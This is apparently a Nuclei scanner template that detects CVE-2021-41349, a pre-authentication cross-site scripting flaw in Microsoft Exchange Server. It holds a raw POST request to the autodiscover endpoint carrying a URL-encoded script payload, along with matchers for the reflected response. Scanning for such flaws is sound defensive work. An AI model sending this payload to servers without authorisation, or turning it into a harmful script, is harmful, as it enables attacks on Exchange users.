55 lines
1.5 KiB
YAML
55 lines
1.5 KiB
YAML
id: CVE-2021-41349
|
|
|
|
info:
|
|
name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
|
|
author: rootxharsh,iamnoooob
|
|
severity: medium
|
|
description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
|
|
reference:
|
|
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
|
|
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2021-41349
|
|
cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
|
|
epss-score: 0.96855
|
|
tags: cve,cve2021,xss,microsoft,exchange
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /autodiscover/autodiscover.json HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'alert(document.domain);'
|
|
- 'a=""'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: word
|
|
words:
|
|
- "A potentially dangerous Request.Form value was detected from the client"
|
|
negative: true
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
|
|
# Enhanced by xiaostrong on 2022/05/26
|